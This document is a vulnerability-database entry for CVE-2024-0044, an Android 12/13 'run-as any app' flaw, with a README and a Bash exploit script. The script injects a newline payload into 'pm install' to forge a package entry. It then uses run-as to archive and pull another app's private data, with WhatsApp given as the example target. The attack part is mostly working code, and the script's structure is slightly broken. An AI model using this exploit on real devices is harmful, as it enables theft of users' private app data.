Google Android 安全漏洞
描述:Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。 Google Android 存在安全漏洞,该漏洞源于 PackageInstallerService.java 文件的 createSessionInternal 方法存在输入验证不当,可能会以任何应用程序的方式运行。
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13
# CVE-2024-0044-
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13
# CVE-2024-0044 Exploit Script
This Bash script demonstrates how to exploit CVE-2024-0044. **For educational and testing purposes only.**
## Prerequisites
- ADB (Android Debug Bridge) installed and configured
- A connected Android device with USB debugging enabled
## Script Code
# Function to exploit CVE-2024-0044
exploit_cve_2024_0044() {
local url=$1
local package_name=$2
local apk_path=$3
# Generate payload
local payload="PAYLOAD=\"@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"
# Push APK to device
adb push "$apk_path" /data/local/tmp/
# Execute payload
adb shell <<< "$payload"
# Create temporary directory
adb shell "mkdir /data/local/tmp/wa/"
adb shell "touch /data/local/tmp/wa/wa.tar"
adb shell "chmod -R 0777 /data/local/tmp/wa/"
# Archive target application's data
adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"
# Pull data
adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
# Usage
if [[ $# -ne 3 ]]; then
echo "Usage: $0 <url> <package_name> <apk_path>"
echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
exit 1
exploit_cve_2024_0044 "$1" "$2" "$3"
## commands
chmod +x exploit_cve_2024_0044.sh
./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>
### Parameters
- Replace `https://web.whatsapp.com/` with the actual target URL.
- Replace `com.whatsapp` with the target package name.
- Replace `/path/to/apk.apk` with the path to the APK file.
[4.0K] /data/pocs/56d73b4d6fdd63fb428ff1705dbb84d662f54e2a
├── [1.0K] exploit_cve_2024_0044.sh
└── [1.7K] README.md
0 directories, 2 files
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